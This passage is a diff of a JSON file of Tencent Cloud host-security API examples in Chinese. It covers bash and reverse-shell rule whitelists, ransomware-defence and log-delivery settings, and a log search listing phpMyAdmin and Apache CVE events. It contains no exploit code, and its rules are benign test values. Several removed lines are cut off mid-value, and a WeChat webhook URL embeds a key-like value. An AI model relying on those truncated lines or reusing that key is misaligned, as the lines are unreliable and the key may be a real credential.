"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ModifyBashPolicy\n<公共请求参数>\n\n{\n \"Policy\": {\n \"Enable\": \"1\",\n \"Name\": \"testbash\",\n \"BashAction\": \"1\",\n \"Level\": \"0\",\n \"Descript\": \"testbash\",\n \"Rule\": \"dGVzdCo\",\n \"Scope\": \"3\",\n \"White\": \"1\",\n \"DealOldEvents\": \"0\",\n \"Rules\": {\n \"Process\": {\n \"Exe\": \"L3RtcC90ZXN0Cg==\",\n \"Cmdline\": \"c2ggL3RtcC90ZXN0Cg==\"\n }\n }\n }\n}",
|
3565
3537
|
"output": "{\n \"Response\": {\n \"RequestId\": \"ecf21829-71f7-4de6-86c8-6c73e575efbe\"\n }\n}",
|
3566
3538
|
"title": "添加白名单"
|
3567
3539
|
}
|
3568
3540
|
],
|
3569
3541
|
"ModifyBashPolicyStatus": [
|
3570
|
-
{
|
3571
|
-
"document": "",
|
3572
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ModifyBashPolicyStatus\n<公共请求参数>\n\n{\n \"Enable\": \"0\",\n \"Id\": \"10006\"\n}",
|
3573
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"18db3474-a2a2-4763-9e36-d1379a98194c\"\n }\n}",
|
3574
|
-
"title": "设置策略不生效"
|
3575
|
-
},
|
3576
3542
|
{
|
3577
3543
|
"document": "",
|
3578
3544
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ModifyBashPolicyStatus\n<公共请求参数>\n\n{\n \"Enable\": \"0\",\n \"Id\": \"100\"\n}",
|
3579
3545
|
"output": "{\n \"Response\": {\n \"RequestId\": \"354f4ac3-8546-4516-8c8a-69e3ab73aa8a\"\n }\n}",
|
3580
3546
|
"title": "切换高危命令规则状态"
|
3547
|
+
},
|
3548
|
+
{
|
3549
|
+
"document": "",
|
3550
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ModifyBashPolicyStatus\n<公共请求参数>\n\n{\n \"Enable\": \"0\",\n \"Id\": \"10006\"\n}",
|
3551
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"18db3474-a2a2-4763-9e36-d1379a98194c\"\n }\n}",
|
3552
|
+
"title": "设置策略不生效"
|
3581
3553
|
}
|
3582
3554
|
],
|
3583
3555
|
"ModifyBruteAttackRules": [
|
@@ -3647,15 +3619,15 @@
|
|
3647
3619
|
"ModifyLicenseOrder": [
|
3648
3620
|
{
|
3649
3621
|
"document": "修改订单容量&别名&项目ID",
|
3650
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ModifyLicenseOrder\n<公共请求参数>\n\n{\n \"Alias\": \"别名\",\n \"ProjectId\":
|
3651
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"bfcd9422-e824-4651-8fe3-1af96781ce6e\",\n \"DealNames\": [],\n \"ResourceIds\": [\n \"cwplic-
|
3622
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ModifyLicenseOrder\n<公共请求参数>\n\n{\n \"Alias\": \"别名\",\n \"ProjectId\": 1,\n \"ResourceId\": \"cwplic-dadad\",\n \"InquireNum\": 10\n}",
|
3623
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"bfcd9422-e824-4651-8fe3-1af96781ce6e\",\n \"DealNames\": [\n \"627351673\"\n ],\n \"ResourceIds\": [\n \"cwplic-dadad\"\n ]\n }\n}",
|
3652
3624
|
"title": "编辑订单"
|
3653
3625
|
}
|
3654
3626
|
],
|
3655
3627
|
"ModifyLicenseUnBinds": [
|
3656
3628
|
{
|
3657
3629
|
"document": "",
|
3658
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ModifyLicenseUnBinds\n<公共请求参数>\n\n{\n \"ResourceId\": \"
|
3630
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ModifyLicenseUnBinds\n<公共请求参数>\n\n{\n \"ResourceId\": \"a11d268f-1601-4f63-9131-0382537b9e55\",\n \"LicenseType\": 0,\n \"IsAll\": true,\n \"QuuidList\": []\n}",
|
3659
3631
|
"output": "{\n \"Response\": {\n \"RequestId\": \"a11d268f-1601-4f63-9131-0382537b9e55\",\n \"ErrMsg\": []\n }\n}",
|
3660
3632
|
"title": "示例"
|
3661
3633
|
}
|
@@ -3663,7 +3635,7 @@
|
|
3663
3635
|
"ModifyLogKafkaAccess": [
|
3664
3636
|
{
|
3665
3637
|
"document": "",
|
3666
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ModifyLogKafkaAccess\n<公共请求参数>\n\n{\n \"Username\": \"
|
3638
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ModifyLogKafkaAccess\n<公共请求参数>\n\n{\n \"Username\": \"username\",\n \"VpcId\": \"1.1.1.1\",\n \"Zone\": \"广州\",\n \"KafkaId\": \"kafkaid\",\n \"InsVersion\": \"1.1.1\",\n \"AccessType\": \"1\",\n \"KafkaEnvName\": \"主机安全测试环境\",\n \"BandWidth\": \"300\",\n \"AccessAddr\": \"1.1.1.1\",\n \"Pwd\": \"password\",\n \"DiskSize\": \"400\",\n \"SubnetId\": \"1.1.1.1\",\n \"DeliverTypeDetails\": [\n {\n \"Status\": \"0\",\n \"TopicId\": \"11\",\n \"SecurityType\": \"1\",\n \"LogType\": [\n \"1\"\n ],\n \"Switch\": \"0\",\n \"StatusTime\": \"11\",\n \"TopicName\": \"11\",\n \"ErrInfo\": \"1\"\n }\n ],\n \"Az\": \"广州三区\",\n \"DeliverStatus\": \"1\",\n \"HasPwd\": \"1\"\n}",
|
3667
3639
|
"output": "{\n \"Response\": {\n \"RequestId\": \"fee0ea18-d002-4af0-bee3-7f6efd19e357\"\n }\n}",
|
3668
3640
|
"title": "示例"
|
3669
3641
|
}
|
@@ -3671,7 +3643,7 @@
|
|
3671
3643
|
"ModifyLogKafkaDeliverType": [
|
3672
3644
|
{
|
3673
3645
|
"document": "",
|
3674
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ModifyLogKafkaDeliverType\n<公共请求参数>\n\n{\n \"SecurityType\": 1,\n \"LogType\": [\n 1,\n 2\n ],\n \"Switch\": 1,\n \"TopicId\": \"
|
3646
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ModifyLogKafkaDeliverType\n<公共请求参数>\n\n{\n \"SecurityType\": 1,\n \"LogType\": [\n 1,\n 2\n ],\n \"Switch\": 1,\n \"TopicId\": \"topic-xdd***\",\n \"TopicName\": \"n\"\n}",
|
3675
3647
|
"output": "{\n \"Response\": {\n \"RequestId\": \"c\"\n }\n}",
|
3676
3648
|
"title": "修改指定日志类别投递配置、开关"
|
3677
3649
|
}
|
@@ -3679,8 +3651,8 @@
|
|
3679
3651
|
"ModifyLogKafkaState": [
|
3680
3652
|
{
|
3681
3653
|
"document": "",
|
3682
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ModifyLogKafkaState\n<公共请求参数>\n\n{\n \"KafkaEnvName\": \"主机安全测试环境\",\n \"KafkaId\": \"ckafka-ce80kte5\",\n \"AccessType\": 1,\n \"AccessAddr\": \"127.0.0.1:80\",\n \"Username\": \"12\",\n \"Zone\": \"广州\",\n \"Az\": \"广州三区\",\n \"VpcId\": \"
|
3683
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"
|
3654
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ModifyLogKafkaState\n<公共请求参数>\n\n{\n \"KafkaEnvName\": \"主机安全测试环境\",\n \"KafkaId\": \"ckafka-ce80kte5\",\n \"AccessType\": 1,\n \"AccessAddr\": \"127.0.0.1:80\",\n \"Username\": \"12\",\n \"Zone\": \"广州\",\n \"Az\": \"广州三区\",\n \"VpcId\": \"vpc-ad*\",\n \"SubnetId\": \"subnet-*\",\n \"DeliverStatus\": 1,\n \"InsVersion\": \"0.10.2.1\",\n \"BandWidth\": 1200,\n \"DiskSize\": 2500\n}",
|
3655
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"29b37d86-f63d-43d1-b21a-640e82965198\"\n }\n}",
|
3684
3656
|
"title": "修改日志投递状态信息"
|
3685
3657
|
}
|
3686
3658
|
],
|
@@ -3688,14 +3660,14 @@
|
|
3688
3660
|
{
|
3689
3661
|
"document": "修改日志存储配置",
|
3690
3662
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ModifyLogStorageConfig\n<公共请求参数>\n\n{\n \"Type\": [\n \"malware\"\n ],\n \"Period\": 0,\n \"IsModifyPeriod\": true\n}",
|
3691
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"
|
3663
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"e5b4724c-49af-46ab-bd84-cdbae897e7e0\"\n }\n}",
|
3692
3664
|
"title": "修改日志存储配置"
|
3693
3665
|
}
|
3694
3666
|
],
|
3695
3667
|
"ModifyLoginWhiteInfo": [
|
3696
3668
|
{
|
3697
3669
|
"document": "编辑登录审计白名单",
|
3698
|
-
"input": "https://cwp.tencentcloudapi.com/?Action=ModifyLoginWhiteInfo\n&HostLoginWhiteObj.Places.0.CityId=
|
3670
|
+
"input": "https://cwp.tencentcloudapi.com/?Action=ModifyLoginWhiteInfo\n&HostLoginWhiteObj.Places.0.CityId=764\n&HostLoginWhiteObj.Places.0.ProvinceId=11\n&HostLoginWhiteObj.Places.0.CountryId=1\n&HostLoginWhiteObj.SrcIp=1.2.3.4\n&HostLoginWhiteObj.UserName=\"aaa\"\n&HostLoginWhiteObj.Id=128\n&HostLoginWhiteObj.Remark=\"updateRemark1\"\n&<公共请求参数>",
|
3699
3671
|
"output": "{\n \"Response\": {\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\"\n }\n}",
|
3700
3672
|
"title": "编辑登录审计白名单"
|
3701
3673
|
}
|
@@ -3719,7 +3691,7 @@
|
|
3719
3691
|
"ModifyMachineRemark": [
|
3720
3692
|
{
|
3721
3693
|
"document": "修改主机备注信息",
|
3722
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ModifyMachineRemark\n<公共请求参数>\n\n{\n \"Remark\": \"remark for host1\",\n \"Quuid\": \"
|
3694
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ModifyMachineRemark\n<公共请求参数>\n\n{\n \"Remark\": \"remark for host1\",\n \"Quuid\": \"5a540076-d38a-4078-aa98-e7c86371d322\"\n}",
|
3723
3695
|
"output": "{\n \"Response\": {\n \"RequestId\": \"8564b09e-0e04-4516-bb59-db09742503c2\"\n }\n}",
|
3724
3696
|
"title": "修改主机备注信息"
|
3725
3697
|
}
|
@@ -3728,7 +3700,7 @@
|
|
3728
3700
|
{
|
3729
3701
|
"document": "",
|
3730
3702
|
"input": "https://cwp.tencentcloudapi.com/?Action=ModifyMaliciousRequestWhiteList\n&Id=1\n&Domain=www.qq.com\n&<公共请求参数>",
|
3731
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"
|
3703
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"29b37d86-f63d-43d1-b21a-640e82965198\"\n }\n}",
|
3732
3704
|
"title": "更新恶意请求白名单"
|
3733
3705
|
}
|
3734
3706
|
],
|
@@ -3759,14 +3731,14 @@
|
|
3759
3731
|
"ModifyNetAttackWhiteList": [
|
3760
3732
|
{
|
3761
3733
|
"document": "编辑网络攻击白名单",
|
3762
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ModifyNetAttackWhiteList\n<公共请求参数>\n\n{\n \"QuuidList\": [\n \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\"\n ],\n \"Scope\": 0,\n \"SrcIp\": [\n \"1.2.3.5\",\n \"1.1.1.2-1.1.1.4\",\n \"1.2.3.0/24\"\n ],\n \"DealOldEvents\": 0,\n \"Description\": \"
|
3734
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ModifyNetAttackWhiteList\n<公共请求参数>\n\n{\n \"QuuidList\": [\n \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\"\n ],\n \"Scope\": 0,\n \"SrcIp\": [\n \"1.2.3.5\",\n \"1.1.1.2-1.1.1.4\",\n \"1.2.3.0/24\"\n ],\n \"DealOldEvents\": 0,\n \"Description\": \"接口测试,勿删\",\n \"Id\": 10001\n}",
|
3763
3735
|
"output": "{\n \"Response\": {\n \"RequestId\": \"1a07706f-368e-49e5-8967-594826f43d0d\"\n }\n}",
|
3764
3736
|
"title": "编辑网络攻击白名单"
|
3765
3737
|
}
|
3766
3738
|
],
|
3767
3739
|
"ModifyOrderAttribute": [
|
3768
3740
|
{
|
3769
|
-
"document": "",
|
3741
|
+
"document": "修改订单属性",
|
3770
3742
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ModifyOrderAttribute\n<公共请求参数>\n\n{\n \"LicenseType\": 1,\n \"ResourceId\": \"resource_id\",\n \"AttrName\": \"alias\",\n \"AttrValue\": \"资源别名\"\n}",
|
3771
3743
|
"output": "{\n \"Response\": {\n \"RequestId\": \"d09cfcae-fab2-4cb7-a41e-5fd4c12d69f4\"\n }\n}",
|
3772
3744
|
"title": "示例"
|
@@ -3776,7 +3748,7 @@
|
|
3776
3748
|
{
|
3777
3749
|
"document": "修改防勒索事件状态",
|
3778
3750
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ModifyRansomDefenseEventsStatus\n<公共请求参数>\n\n{\n \"Status\": 1,\n \"Ids\": [\n 1\n ]\n}",
|
3779
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"
|
3751
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"935e27b1-d675-4509-80bf-96fbf0764237\"\n }\n}",
|
3780
3752
|
"title": "修改防勒索事件状态"
|
3781
3753
|
}
|
3782
3754
|
],
|
@@ -3784,14 +3756,14 @@
|
|
3784
3756
|
{
|
3785
3757
|
"document": "",
|
3786
3758
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ModifyRansomDefenseStrategyStatus\n<公共请求参数>\n\n{\n \"Status\": 1,\n \"IsAll\": 1,\n \"IdList\": [\n 1\n ]\n}",
|
3787
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"
|
3759
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"935e27b1-d675-4509-80bf-96fbf0764237\"\n }\n}",
|
3788
3760
|
"title": "批量修改防勒索策略状态"
|
3789
3761
|
}
|
3790
3762
|
],
|
3791
3763
|
"ModifyReverseShellRulesAggregation": [
|
3792
3764
|
{
|
3793
3765
|
"document": "增加正则规则",
|
3794
|
-
"input": "POST / HTTP/1.1\nHost:
|
3766
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ModifyReverseShellRulesAggregation\n<公共请求参数>\n\n{\n \"IsGlobal\": 1,\n \"WhiteType\": 1,\n \"RuleRegexp\": \"sh cmdline\",\n \"HandleHistory\": 1,\n \"GroupID\": \"12\"\n}",
|
3795
3767
|
"output": "{\n \"Response\": {\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\"\n }\n}",
|
3796
3768
|
"title": "增加正则规则"
|
3797
3769
|
}
|
@@ -3799,7 +3771,7 @@
|
|
3799
3771
|
"ModifyRiskDnsPolicy": [
|
3800
3772
|
{
|
3801
3773
|
"document": "",
|
3802
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ModifyRiskDnsPolicy\n<公共请求参数>\n\n{\n \"Data\": {\n \"PolicyId\": 5000001,\n \"PolicyName\": \"
|
3774
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ModifyRiskDnsPolicy\n<公共请求参数>\n\n{\n \"Data\": {\n \"PolicyId\": 5000001,\n \"PolicyName\": \"auto_****\",\n \"PolicyType\": 1,\n \"PolicyDesc\": \"desc\",\n \"PolicyAction\": 1,\n \"HostScope\": 1,\n \"HostIds\": [\n \"a918d8a1-c4c1-4998-80ff-5a60792c93a8\"\n ],\n \"Domains\": [\n \"YS5jb20=\"\n ],\n \"IsEnabled\": 1,\n \"IsDealOldEvent\": 1,\n \"UpdateTime\": \"2022-09-19 17:12:01\",\n \"EventId\": 1\n }\n}",
|
3803
3775
|
"output": "{\n \"Response\": {\n \"RequestId\": \"130e109f-a922-4d16-827d-b17a366125a2\"\n }\n}",
|
3804
3776
|
"title": "更改恶意请求策略"
|
3805
3777
|
}
|
@@ -3815,8 +3787,8 @@
|
|
3815
3787
|
"ModifyRiskEventsStatus": [
|
3816
3788
|
{
|
3817
3789
|
"document": "需要批量更新事件的状态时",
|
3818
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ModifyRiskEventsStatus\n<公共请求参数>\n\n{\n \"UpdateAll\": true,\n \"RiskType\": \"
|
3819
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"
|
3790
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ModifyRiskEventsStatus\n<公共请求参数>\n\n{\n \"UpdateAll\": true,\n \"RiskType\": \"MALWARE\",\n \"Ip\": [\n \"0.0.0.0\"\n ],\n \"Ids\": [\n 1\n ],\n \"KillProcess\": true,\n \"ExcludeId\": [\n 1\n ],\n \"Operate\": 1,\n \"DoClean\": false\n}",
|
3791
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"a066ece3-12ca-4611-b98e-1c296a14a491\",\n \"IsSync\": 1\n }\n}",
|
3820
3792
|
"title": "示例"
|
3821
3793
|
}
|
3822
3794
|
],
|
@@ -3831,8 +3803,8 @@
|
|
3831
3803
|
"ModifyVulDefenceEventStatus": [
|
3832
3804
|
{
|
3833
3805
|
"document": "",
|
3834
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ModifyVulDefenceEventStatus\n<公共请求参数>\n\n{\n \"Ids\": [\n
|
3835
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"
|
3806
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ModifyVulDefenceEventStatus\n<公共请求参数>\n\n{\n \"Ids\": [\n 13654\n ],\n \"Status\": 3\n}",
|
3807
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"935e27b1-d675-4509-80bf-96fbf0764237\"\n }\n}",
|
3836
3808
|
"title": "修改漏洞防御事件状态"
|
3837
3809
|
}
|
3838
3810
|
],
|
@@ -3887,7 +3859,7 @@
|
|
3887
3859
|
"ModifyWebHookRule": [
|
3888
3860
|
{
|
3889
3861
|
"document": "新增或修改企微机器人规则",
|
3890
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ModifyWebHookRule\n<公共请求参数>\n\n{\n \"Data\": {\n \"RuleName\": \"测试机器人\",\n \"HookAddr\": \"https://qyapi.weixin.qq.com/cgi-bin/webhook/send?key=747c393e-f771-47ca-af0a-cc36b88f107a\",\n \"RuleRemark\": \"\",\n \"RuleItems\": [\n {\n \"Type\": 2,\n \"ControlBit\": \"01111\"\n }\n ],\n \"HostLabels\": [],\n \"IsDisabled\": 1,\n \"RuleId\": 55\n }\n}",
|
3862
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ModifyWebHookRule\n<公共请求参数>\n\n{\n \"Data\": {\n \"RuleName\": \"测试机器人\",\n \"HookAddr\": \"https://qyapi.weixin.qq.com/cgi-bin/webhook/send?key=747c393e-f771-47ca-af0a-cc36b88f107a\",\n \"RuleRemark\": \"mark\",\n \"RuleItems\": [\n {\n \"Type\": 2,\n \"ControlBit\": \"01111\"\n }\n ],\n \"HostLabels\": [],\n \"IsDisabled\": 1,\n \"RuleId\": 55\n }\n}",
|
3891
3863
|
"output": "{\n \"Response\": {\n \"RequestId\": \"747c393e-f771-47ca-af0a-cc36b88f107a\"\n }\n}",
|
3892
3864
|
"title": "新增或修改企微机器人规则"
|
3893
3865
|
}
|
@@ -3928,22 +3900,22 @@
|
|
3928
3900
|
{
|
3929
3901
|
"document": "",
|
3930
3902
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: RansomDefenseRollback\n<公共请求参数>\n\n{\n \"Quuid\": \"1c26308c-5493-4eaf-a817-112ec25f499e\",\n \"BackupTime\": \"2019-12-25 11:57:15\"\n}",
|
3931
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"
|
3903
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"1ce68339-8828-457f-b358-d5b1b34e4fe9\"\n }\n}",
|
3932
3904
|
"title": "防勒索快照回滚"
|
3933
3905
|
}
|
3934
3906
|
],
|
3935
3907
|
"RecoverMalwares": [
|
3936
3908
|
{
|
3937
3909
|
"document": "本接口(RecoverMalwares)用于批量恢复已经被隔离的木马文件。",
|
3938
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: RecoverMalwares\n<公共请求参数>\n\n{\n \"Ids\": [\n
|
3939
|
-
"output": "{\n \"Response\": {\n \"FailedIds\": [],\n \"RequestId\": \"4985eb7f-62d6-4da8-898f-d92a08660a38\",\n \"SuccessIds\": [\n
|
3910
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: RecoverMalwares\n<公共请求参数>\n\n{\n \"Ids\": [\n 1002,\n 1003\n ]\n}",
|
3911
|
+
"output": "{\n \"Response\": {\n \"FailedIds\": [\n 1003\n ],\n \"RequestId\": \"4985eb7f-62d6-4da8-898f-d92a08660a38\",\n \"SuccessIds\": [\n 1002\n ]\n }\n}",
|
3940
3912
|
"title": "恢复木马文件"
|
3941
3913
|
}
|
3942
3914
|
],
|
3943
3915
|
"RemoveLocalStorageItem": [
|
3944
3916
|
{
|
3945
3917
|
"document": "删除本地存储数据",
|
3946
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: RemoveLocalStorageItem\n<公共请求参数>\n\n{\n \"Key\": \"
|
3918
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: RemoveLocalStorageItem\n<公共请求参数>\n\n{\n \"Key\": \"keyname\"\n}",
|
3947
3919
|
"output": "{\n \"Response\": {\n \"RequestId\": \"bf93077b-51f5-4428-b9de-7e33a0b9cc4a\"\n }\n}",
|
3948
3920
|
"title": "示例"
|
3949
3921
|
}
|
@@ -4023,8 +3995,8 @@
|
|
4023
3995
|
"SearchLog": [
|
4024
3996
|
{
|
4025
3997
|
"document": "",
|
4026
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: SearchLog\n<公共请求参数>\n\n{\n \"Sort\": \"desc\",\n \"Count\": \"20\",\n \"QueryString\": \"
|
4027
|
-
"output": "{\n \"Response\": {\n \"Analysis\": false,\n \"Context\": \"\",\n \"Count\": 17,\n \"Data\": [\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 10:00:27 +0800 CST\\\",\\\"hostip\\\":\\\"10.0.0.6\\\",\\\"level\\\":\\\"中危\\\",\\\"modify_time\\\":\\\"2022-07-01 10:17:05 +0800 CST\\\",\\\"remark\\\":\\\"\\\",\\\"uuid\\\":\\\"13bb1e16-9a7a-434d-9686-4328f72c97d7\\\",\\\"is_emergency\\\":\\\"False\\\",\\\"reference\\\":\\\"https://www.phpmyadmin.net/security/PMASA-2016-20/\\\",\\\"path\\\":\\\"/var/www/html/phpmyadmin\\\",\\\"fix\\\":\\\"1、建议升级到官方最新版本,官网地址:https://www.phpmyadmin.net\\\",\\\"cve_id\\\":\\\"CVE-2016-5704\\\",\\\"cls_event_type\\\":\\\"Web-CMS_vul\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"name\\\":\\\"phpMyAdmin 4.6.x 表结构页面存在XSS漏洞\\\",\\\"id\\\":\\\"771\\\",\\\"vul_category\\\":\\\"Web-CMS漏洞\\\",\\\"descript\\\":\\\"漏洞文件路径: /var/www/html/phpmyadmin/templates/table/structure/display_table_stats.phtml\\\",\\\"event_status\\\":\\\"modify\\\",\\\"status\\\":\\\"待处理\\\"}\",\n \"FileName\": \"\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641946000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 10:00:27 +0800 CST\\\",\\\"hostip\\\":\\\"10.0.0.6\\\",\\\"level\\\":\\\"高危\\\",\\\"modify_time\\\":\\\"2022-07-01 10:17:05 +0800 CST\\\",\\\"remark\\\":\\\"\\\",\\\"uuid\\\":\\\"13bb1e16-9a7a-434d-9686-4328f72c97d7\\\",\\\"is_emergency\\\":\\\"False\\\",\\\"reference\\\":\\\"https://httpd.apache.org/security/vulnerabilities_24.html\\\",\\\"path\\\":\\\"\\\",\\\"fix\\\":\\\"升级至2.4.6-90及以上版本或 2.4.39及以上版本\\\",\\\"cve_id\\\":\\\"CVE-2019-0217\\\",\\\"cls_event_type\\\":\\\"application_vul\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"name\\\":\\\"Apache HTTP Server mod_auth_digest 条件竞争漏洞\\\",\\\"id\\\":\\\"767\\\",\\\"vul_category\\\":\\\"应用漏洞\\\",\\\"descript\\\":\\\"Apache HTTP Server 启用了 mod_auth_digest 模块,且Apache HTTP Server 版本为:2.4.37-47.module_el8.6.0+1111+ce6f4ceb.1。\\\",\\\"event_status\\\":\\\"modify\\\",\\\"status\\\":\\\"待处理\\\"}\",\n \"FileName\": \"\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641946000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 10:00:27 +0800 CST\\\",\\\"hostip\\\":\\\"10.0.0.6\\\",\\\"level\\\":\\\"中危\\\",\\\"modify_time\\\":\\\"2022-07-01 10:17:05 +0800 CST\\\",\\\"remark\\\":\\\"\\\",\\\"uuid\\\":\\\"13bb1e16-9a7a-434d-9686-4328f72c97d7\\\",\\\"is_emergency\\\":\\\"True\\\",\\\"reference\\\":\\\"https://www.phpmyadmin.net/security/PMASA-2016-19/\\\",\\\"path\\\":\\\"/var/www/html/phpmyadmin\\\",\\\"fix\\\":\\\"1、建议升级到官方最新版本,官网地址:https://www.phpmyadmin.net\\\",\\\"cve_id\\\":\\\"CVE-2016-5703\\\",\\\"cls_event_type\\\":\\\"emergency_vul\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"name\\\":\\\"phpMyAdmin central_columns.lib.php SQL注入漏洞\\\",\\\"id\\\":\\\"772\\\",\\\"vul_category\\\":\\\"Web-CMS漏洞\\\",\\\"descript\\\":\\\"漏洞文件路径: /var/www/html/phpmyadmin/libraries/central_columns.lib.php\\\",\\\"event_status\\\":\\\"modify\\\",\\\"status\\\":\\\"待处理\\\"}\",\n \"FileName\": \"\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641946000\n },\n {\n \"Content\": \"{\\\"create_time\\\":\\\"2022-07-01 10:00:27 +0800 CST\\\",\\\"hostip\\\":\\\"10.0.0.6\\\",\\\"level\\\":\\\"高危\\\",\\\"modify_time\\\":\\\"2022-07-01 10:17:05 +0800 CST\\\",\\\"remark\\\":\\\"\\\",\\\"uuid\\\":\\\"13bb1e16-9a7a-434d-9686-4328f72c97d7\\\",\\\"is_emergency\\\":\\\"False\\\",\\\"reference\\\":\\\"https://www.seebug.org/vuldb/ssvid-92512\\\",\\\"path\\\":\\\"/var/www/html/phpmyadmin\\\",\\\"fix\\\":\\\"1、升级到最新版本,官网地址:https://www.phpmyadmin.net\\\",\\\"cve_id\\\":\\\"CVE-2016-6633\\\",\\\"cls_event_type\\\":\\\"Web-CMS_vul\\\",\\\"appid\\\":\\\"1256299843\\\",\\\"name\\\":\\\"phpMyAdmin dbase extension 远程代码执行漏洞\\\",\\\"id\\\":\\\"764\\\",\\\"vul_category\\\":\\\"Web-CMS漏洞\\\",\\\"descript\\\":\\\"漏洞文件路径: /var/www/html/phpmyadmin/libraries/zip_extension.lib.php\\\",\\\"event_status\\\":\\\"modify\\\",\\\"status\\\":\\\"待处理\\\"}\",\n \"FileName\": \"\",\n \"Source\": \"30.46.128.22\",\n \"TimeStamp\": 1656641946000\n },\n {\n \"Content\": 